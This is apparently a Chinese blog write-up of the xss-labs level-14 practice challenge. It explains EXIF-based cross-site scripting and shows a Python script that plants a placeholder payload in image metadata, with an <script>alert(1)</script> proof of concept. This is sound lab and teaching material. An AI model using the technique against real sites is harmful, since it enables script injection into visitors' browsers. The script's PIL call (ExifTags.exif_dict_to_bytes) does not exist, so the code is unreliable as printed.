[网络安全]xss-labs level-14 解题详析

读者可参考、订阅专栏:Xss-Labs靶场攻防实战


姿势

逻辑后端代码:

在这里插入图片描述
该题涉及exif xss漏洞


exif xss漏洞

Exif XSS 漏洞是一种安全漏洞,存在于图片的 Exif(Exchangeable Image File Format)数据中。
Exif 数据是嵌入在数字图像文件中的元数据,包含有关图像的信息,如拍摄日期、相机型号、GPS 坐标等。浏览器和其他应用程序通常会解析和显示这些数据。

在这里插入图片描述

当存在 Exif XSS 漏洞时,攻击者可以在图像的 Exif 数据中插入恶意的 JavaScript 代码。当用户加载带有恶意 Exif 数据的图像时,浏览器或其他应用程序可能会错误地解析恶意代码,并在受害者的浏览器上执行它。

脚本如下:

import PIL.ExifTags as ExifTags
from PIL import Image

# 打开图像文件
image = Image.open('初始.jpg')

# 获取图像的 Exif 数据
exif_data = image._getexif()

# 将 Exif 数据转为可修改的字典格式
exif_dict = dict(exif_data)

# 修改 Exif 数据
exif_dict[ExifTags.TAGS['Make']] = 'xss语句'
exif_dict[ExifTags.TAGS['Model']] = 'xss语句'

# 将修改后的 Exif 数据重新写回图像
exif_bytes = ExifTags.exif_dict_to_bytes(exif_dict)
image.save('改后.jpg', exif=exif_bytes)

先修改iframe标签:

在这里插入图片描述

接着使用脚本修改图像数据,xss语句为:

<script>alert(1)</script>

再上传图片:

在这里插入图片描述

回显如下:

在这里插入图片描述


总结

以上为[网络安全]xss-labs level-14 解题详析,后续将分享[网络安全]xss-labs level-15 解题详析。

我是秋说,我们下次见。

猜你喜欢

转载自blog.csdn.net/2301_77485708/article/details/132097198